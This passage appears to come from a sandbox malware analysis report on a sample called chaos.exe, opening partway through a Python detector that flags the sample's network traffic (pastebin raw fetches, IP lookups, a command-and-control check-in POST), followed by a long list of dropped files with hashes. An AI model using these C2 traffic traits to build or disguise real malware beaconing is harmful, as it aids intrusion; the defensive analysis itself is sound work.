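    method, path, version = lines[0].split(" ", 2)
    req = Request(dst_ip, dst_port, method, path, version)
    for line in lines[1:]:
        name, _, value = line.partition(":")
        req.raw_names.append(name.strip())
        req.headers[name.strip().lower()] = value.strip()
    return req


def detect(req: Request) -> list:
    """Labels that fire for one request."""
    hits = []
    ua = req.headers.get("user-agent", "")
    host = req.headers.get("host", "")
    sfml = ua.startswith("libsfml-network/")
    if sfml:
        hits.append("sfml_user_agent")
    # HTTP/1.0, raw-paste path, almost no headers: a bare library client, not a browser
    if (req.version == "HTTP/1.0" and host.endswith("pastebin.com")
            and req.path.startswith("/raw/") and len(req.headers) <= 4):
        hits.append("terse_pastebin_raw")
    if sfml and IP_LOOKUP_PATH.search(req.path):
        hits.append("external_ip_lookup")
    # Form POST to a bare IP on a non-standard port whose path is 64 hex characters
    if (req.method == "POST" and HEX64_PATH.match(req.path)
            and BARE_IPV4.match(host) and req.dst_port not in (80, 443)
            and req.headers.get("content-type", "").startswith("application/x-www-form-urlencoded")):
        hits.append("cnc_checkin_hex64_post")
    if "connection" in req.raw_names:  # exact lowercase, as the sample sends it
        hits.append("lowercase_connection_header")
    return hits


def scan(captured) -> list:
    """One (dst_ip, dst_port, label, sid) tuple per alert, like the report's table."""
    alerts = []
    for dst_ip, dst_port, raw in captured:
        req = parse_request(dst_ip, dst_port, raw)
        for label in detect(req):
            alerts.append((dst_ip, dst_port, label, REPORT_SIDS[label]))
    return alerts


if __name__ == "__main__":
    for dst_ip, dst_port, label, sid in scan(CAPTURED):
        print(f"local -> {dst_ip}:{dst_port} | {label} | {sid}")
```

The check-in heuristic is deliberately narrow (POST, bare-IP host, odd port, form body, hex path of exactly 64 characters, which is the length of a SHA-256 hex digest and is likely a victim or campaign identifier); loosening any one of those conditions starts matching legitimate API traffic, so in production such a rule belongs in a hunting tier rather than a blocking one.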
Extracted Strings
Extracted Files
Displaying 36 extracted file(s). The remaining 1033 file(s) are available in the full version and XML/JSON reports.
-
Informative 36
-
-
AutoIt3_x64.exe
- Size
- 1MiB (1058355 bytes)
- Type
- data
- Runtime Process
- chaos.exe (PID: 3396)
- MD5
- 67380432932a77ebd77c59e464b53340
- SHA1
- de13c21f609dfc10d416aad3b8a3122f5c2c815a
- SHA256
- 29e79b7e1d453f31b9ef269774c464617fa1df4429e607d29ca5dc023ea310fc
-
603jOLdO.exe
- Size
- 4.3MiB (4516099 bytes)
- Type
- data
- Runtime Process
- chaos.exe (PID: 3396)
- MD5
- f72c2c2a275b7e16dee98450b258b0b0
- SHA1
- 80b63f4fc93f36fdb00c5433111cef5b012f480c
- SHA256
- b549be3aa8d5ae41774ca68a37afeb14779269cbe510fd7cc0edc7376dd39caf
-
AUDIOSEARCHMAIN.DLL
- Size
- 1.6MiB (1668219 bytes)
- Type
- data
- Runtime Process
- chaos.exe (PID: 3396)
- MD5
- 8c06d15dc2dcf7914342be65f61e386e
- SHA1
- 2b95b6dd8fbd47b1add403192d04b843102c4be0
- SHA256
- da717ffe029c4296216fe2ca6a958433940666929cd271599cebf6d9ef75d3b3
-
5F7TBCLUxJG.doc
- Size
- 4.2MiB (4387075 bytes)
- Type
- data
- Runtime Process
- chaos.exe (PID: 3396)
- MD5
- dc41365d5031b7679e4aaa938a2284c1
- SHA1
- fef1405501d05bcae50e2f9d33d5f7d21d77b364
- SHA256
- 1366c63350562310f4f482ff502382ca0c36b218995079f658dd9d24309fe8e2
-
AcroRd32.exe
- Size
- 2.1MiB (2227955 bytes)
- Type
- doc office
- Description
- data
- Runtime Process
- chaos.exe (PID: 3396)
- MD5
- 6dd25c6393e69689feaeccb413dfb503
- SHA1
- 4c3a36634c7add662270350dbecfcb225debf17c
- SHA256
- d30c266446e447daf89ae6bc57b3508cd226de6e9da810105909548b74ba3606
-
ACEWDAT.DLL
- Size
- 2.9MiB (3051171 bytes)
- Type
- data
- Runtime Process
- chaos.exe (PID: 3396)
- MD5
- 356344533c0c7525e60f954f91553ba4
- SHA1
- 4f8ab640123b72375d367057cfaa85ce29acc6f8
- SHA256
- 500f2c6091304c12d6d4814b32ce45dfa849da9885f0483b7db2b95f513a35a1
-
Adobe AIR Application Installer.swf
- Size
- 714KiB (731541 bytes)
- Type
- data
- Runtime Process
- chaos.exe (PID: 3396)
- MD5
- 9bc155deb14601ce29e0beda5744a4c6
- SHA1
- 4051708c501b8bc4536a15bb4e38876fe2a24d39
- SHA256
- 2a90072415ff6e01b2d6b3cfb1bf9d6d9ca941caa2cff191914155e9eb890491
-
ant-javafx.jar
- Size
- 1.4MiB (1419574 bytes)
- Type
- data
- Runtime Process
- chaos.exe (PID: 3396)
- MD5
- 3037e9d58f015dde62d53dc793cfca34
- SHA1
- 606dea5ef931070846870ffe4497b00a1db55c76
- SHA256
- b4029b2e2c17786f9065187bcc9389f6d55c5d17e225c75d41506b66c5dccda4
-
AdobeCollabSync.exe
- Size
- 866KiB (887027 bytes)
- Type
- data
- Runtime Process
- chaos.exe (PID: 3396)
- MD5
- 92aa9e8e1db7142200e91ce8e36aec61
- SHA1
- 1bf66f10c4154df3783876224c52bdfbf0b5e8f4
- SHA256
- 415f97d7acb1e217a664b74a70cba728a84d909ac3e0656f0c1cf383bf490d58
-
AXSLE.dll
- Size
- 611KiB (625395 bytes)
- Type
- data
- Runtime Process
- chaos.exe (PID: 3396)
- MD5
- f0068a3fea3925db184da73393f74574
- SHA1
- 797249d6ecf92562f8d4a87c34108bf28d183198
- SHA256
- 3b8cfb3c555dc29d859eafeb6e874d9785bece28e42849b71b23917b793a545a
-
AIDE.dll
- Size
- 1.1MiB (1142099 bytes)
- Type
- data
- Runtime Process
- chaos.exe (PID: 3396)
- MD5
- fc6e20a7ce5f657691db77291a059f3d
- SHA1
- 0fc7dfebf262b96f50a93177ece154e4015fcc51
- SHA256
- 159d2b9ceba2e4f6a2605dd2fd6139afd229cee9bece8c851b89de6e26d178b2
-
3LnBJn.doc
- Size
- 1.6MiB (1696003 bytes)
- Type
- data
- Runtime Process
- chaos.exe (PID: 3396)
- MD5
- 1ebd110bc302b2f03bbd3e086d00cb27
- SHA1
- e35571c3207968447081f0995498e6208a1dcdd3
- SHA256
- 75aa8f8ea15a92e02019105626bf3557ce508371e96f2a23f6523f012d30e70c
-
ACE.dll
- Size
- 932KiB (954611 bytes)
- Type
- data
- Runtime Process
- chaos.exe (PID: 3396)
- MD5
- 3c6c865f689e24faf19dfaf486b04da8
- SHA1
- fafbab84cd9a8af5b5f3fdaae12e7fc604377754
- SHA256
- 50202e47ed58cce1576a2a297617f337cb99f5cb63ef209894c81f11e7de54a7
-
awt.dll
- Size
- 1.1MiB (1181507 bytes)
- Type
- data
- Runtime Process
- chaos.exe (PID: 3396)
- MD5
- e32576c85d4997d4385a03167ac4a6b6
- SHA1
- 0bedd6c650d1fc2b81ab9d45545f9d1262f5d662
- SHA256
- 34428bb351d8a2f5e97c5f99e834836638ca5e61d96f67c9dbc21ce07a1e2490
-
7zFM.exe
- Size
- 820KiB (839427 bytes)
- Type
- doc office
- Description
- data
- Runtime Process
- chaos.exe (PID: 3396)
- MD5
- 18130790c9145169a3515f32dc1f3660
- SHA1
- 52b054761c48e6e0d3ca7c9a438a6894c65e9cbd
- SHA256
- 7659ff2e705e5fd4e66a5ceef7496866ad01f21dfd83dfb3c6ec3f4c49c37456
-
4RHcGmkB.exe
- Size
- 2.6MiB (2736387 bytes)
- Type
- data
- Runtime Process
- chaos.exe (PID: 3396)
- MD5
- 98b3905381c4f88d5d73cd28c8e0b629
- SHA1
- 3291206d62d9e60f7eb7acc26c00399363270516
- SHA256
- 398583b251b2d4e64e024fda412d2557154d2843ffe1d0c869081b20d7344bb0
-
ACEDAO.DLL
- Size
- 728KiB (745147 bytes)
- Type
- ppt office
- Description
- data
- Runtime Process
- chaos.exe (PID: 3396)
- MD5
- 8739115dea260918628ca5ffc2dda095
- SHA1
- 5a096ab08bd71b34f8a6e449b4004a68432f7d1e
- SHA256
- 98b0f0826bfa0e7e51e2d615b9c3309825d4acd9fc75a0f0b5402ec6f8465587
-
AdobeARM.exe
- Size
- 1.1MiB (1171739 bytes)
- Type
- doc office
- Description
- 8086 relocatable (Microsoft)
- Runtime Process
- chaos.exe (PID: 3396)
- MD5
- 4a3b2096a3bc14890250795e16fb20f3
- SHA1
- 23d5a31f8d6a6701177a4901ed141beb05ffa612
- SHA256
- 719a8af308ef2d895a869485adc8e6d0aa7a9482eb4386b737af8abadc714e55
-
ACEES.DLL
- Size
- 990KiB (1013419 bytes)
- Type
- data
- Runtime Process
- chaos.exe (PID: 3396)
- MD5
- 0c336287c12c63d2ba492c327a99aa4d
- SHA1
- 08a3e8db4aa925257014991ef14153f5a5582104
- SHA256
- b014d210818c7989dedf906c15752c01e29d389aa88308e3736e5ca38fb6d812
-
AdobeHunspellPlugin.dll
- Size
- 1.9MiB (1966499 bytes)
- Type
- data
- Runtime Process
- chaos.exe (PID: 3396)
- MD5
- d67dd0cddcb3c96e9822e8f167e4a1ca
- SHA1
- bc7d8ad9b8b68212e5043500792b40a6f29a6bf6
- SHA256
- 48429db2aa443ea513785f6022883bf9dd8ea6ef6b15183918e8c8ca30584d4a
-
2VEV49vrsTLgZa.doc
- Size
- 911KiB (933123 bytes)
- Type
- data
- Runtime Process
- chaos.exe (PID: 3396)
- MD5
- 980a93d2e036cbd822fb90282c769b26
- SHA1
- 906be8bf74f0368a1ae34e8e8c4c6ec53b2160b1
- SHA256
- e1d20a7d970ca85b7eda3a06cd62042978a973b6c7603b4856d190995c200250
-
AUDIOSEARCHSAPIFE.DLL
- Size
- 2.1MiB (2243227 bytes)
- Type
- data
- Runtime Process
- chaos.exe (PID: 3396)
- MD5
- cc21356e84bec4c50d060e7ea0d552b0
- SHA1
- 9cca72f7cab257a61fb7ba818a9bd8e151ada41d
- SHA256
- 4b2c8b35bfa4bcab36b22d41c3b5c6b4244dec8728b5c84c5623fdc12cfa9d1f
-
Aut2exe.exe
- Size
- 1.3MiB (1392187 bytes)
- Type
- data
- Runtime Process
- chaos.exe (PID: 3396)
- MD5
- d3df5df1d80be7c7609d9023ceac6739
- SHA1
- e17e8a84333e107057941f5e70508ed10ae85170
- SHA256
- 240c6960a7277ec4287d20f065ffc99c98b039ca38e5aaba8c065a92dd5fb6a3
-
ACEREP.DLL
- Size
- 676KiB (691875 bytes)
- Type
- data
- Runtime Process
- chaos.exe (PID: 3396)
- MD5
- 6f70b4b060b400b473d4e0b555320f0a
- SHA1
- c05c9a17828e1392ee61a9c8e134da3cf9c88f14
- SHA256: de0be9e23c01b37fee0da73327eab47c43415aaa27ecb6c0e27070efecd1a1d8
-
2f07Jm4brrx.exe
- Size: 2.9MiB (3084547 bytes)
- Type: data
- Runtime Process: chaos.exe (PID: 3396)
- MD5: 11ddf7eb87a85180f5d197ffccc97b38
- SHA1: ea22f283a0750bd0e44becb22aff77527ebc7259
- SHA256: 97fde67e56efe3a9bc6e1a600eac3fc374375ee6caeb279a76af7c1b0c87fcc0
-
ACEEXCL.DLL
- Size: 878KiB (898715 bytes)
- Type: xlsx office
- Runtime Process: chaos.exe (PID: 3396)
- MD5: 1e2c25b8a2545a158bc3682377ed074b
- SHA1: 0ca298c3a8b5593132b8247c2ffb38873f0331bb
- SHA256: b85141b600daeef199dd6fb77e3ced0f3314385942e82425b76a3011c7c2ea05
-
AGM.dll
- Size: 4.9MiB (5136115 bytes)
- Type: doc office
- Description: data
- Runtime Process: chaos.exe (PID: 3396)
- MD5: 91eaf67ecef81e9d11c1c1f6b0535e2f
- SHA1: 3c889679b66e95d8a976894957a0633b4cd68451
- SHA256: 22bccee7a2e4be13e6a91c939718010b74a1b252f091dfc0344d1032010705f4
-
AcroRead.msi
- Size: 2.7MiB (2793219 bytes)
- Type: doc office
- Description: data
- Runtime Process: chaos.exe (PID: 3396)
- MD5: a83b19f16033729dec7d69fb67eac1a0
- SHA1: 7c3c0bd6ecaf22907493ecd37c362f2678633a9c
- SHA256: f0d1c8fdfd702baa17e8b244d1084e0ffdb3e2db0291aac1e40615c86c9ad44f
-
7z.dll
- Size: 1.5MiB (1609475 bytes)
- Type: data
- Runtime Process: chaos.exe (PID: 3396)
- MD5: ef6be936904220ba7feff4f17b389f8f
- SHA1: f14e20ff5aea81d57708bc888241d1d692a2dd08
- SHA256: 5e1b046265057c900cca2ecf988cdccfd8af7c40e40b512677848ac8aa460130
-
Aut2exe_x64.exe
- Size: 1.4MiB (1433659 bytes)
- Type: data
- Runtime Process: chaos.exe (PID: 3396)
- MD5: f73d14075f2211379196344d00d520c1
- SHA1: 7fb634185603337171180df0fc65c558f36a7534
- SHA256: acbf6d111e82c1d1bbe14d20a394718394938964b61b91fab4fa5ed99c6c72fd
-
7mOyQqezSRsEQhHm.exe
- Size: 4.3MiB (4531459 bytes)
- Type: data
- Runtime Process: chaos.exe (PID: 3396)
- MD5: fe468801dc7ca83d7e98372beb035615
- SHA1: fd8431dd6c2c635a4805975ab9a9e4084043499a
- SHA256: c0c1e3215e5fbd11d30887804212ddbd772f8cddfd581349b54e39f54d1f169c
-
ACECORE.DLL
- Size: 3.1MiB (3212939 bytes)
- Type: ppt office
- Description: data
- Runtime Process: chaos.exe (PID: 3396)
- MD5: be3543a6b7e0aa79adc2fe1f6871fb9d
- SHA1: 41585f9d9ed85c67a571e3a606c2758b833e1777
- SHA256: 00d059f68ce8330f0965a86e1e1d6594b16a38d75f060f67cca8ab9d4dd177fe
-
07c4.exe
- Size: 3.1MiB (3268867 bytes)
- Type: data
- Runtime Process: chaos.exe (PID: 3396)
- MD5: 872ee99971b333b86f683a13b8f26eaf
- SHA1: 3e7a5ef940599e62663163f25e7f92233808b090
- SHA256: 8cafe9d4e16ba8c908933fb7f698b07dffdbb3df1eff533a13e7dd5087f32006
-
ACEWSTR.DLL
- Size: 843KiB (862867 bytes)
- Type: data
- Runtime Process: chaos.exe (PID: 3396)
- MD5: ba78e00540dd188b779622f85c602756
- SHA1: 3ebd1f302e419948af329f6bec028866dbae0113
- SHA256: c9f814908860b689782f447f05694fd12d21afdcfd9e3d99dc57477bb1d489df
-
ADO210.CHM
- Size: 1.6MiB (1680642 bytes)
- Type: data
- Runtime Process: chaos.exe (PID: 3396)
- MD5: 8c94904325705af2ce2bee6ea8e82db0
- SHA1: f620eb40ae39c77dfdfd275f42abed9ed57bf3a4
- SHA256: db81a0457e82e9a2038b0b798aeccb50ccb2f5a1e6682d8a4e791e2dd822f43a
-
AdjacencyReport.dotx
- Size: 3.4MiB (3600827 bytes)
- Runtime Process: chaos.exe (PID: 3396)
- MD5: 9477cd97a8399080082848b91cc306c4
- SHA1: 003a784dec57837373f30955a54641fae0dd721d
- SHA256: c509abdd9a7e46ae1fa4ab9d12e76f0c35911b8bb2b0ca5bd125a330082fb6ac
-
Notifications
-
Runtime
- Network whitenoise filtering was applied
- Not all IP/URL string resources were checked online
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "binary-0" are available in the report
- Not all sources for indicator ID "binary-10" are available in the report
- Not all sources for indicator ID "hooks-8" are available in the report
- Not all sources for indicator ID "string-63" are available in the report
- Not all sources for indicator ID "string-64" are available in the report
- Not all sources for indicator ID "target-103" are available in the report
- Not all sources for indicator ID "target-25" are available in the report
- Not all strings are visible in the report, because the maximum number of strings was reached (5000)
- Touched the maximum number of extracted files (2000), report might not contain information about some extracted files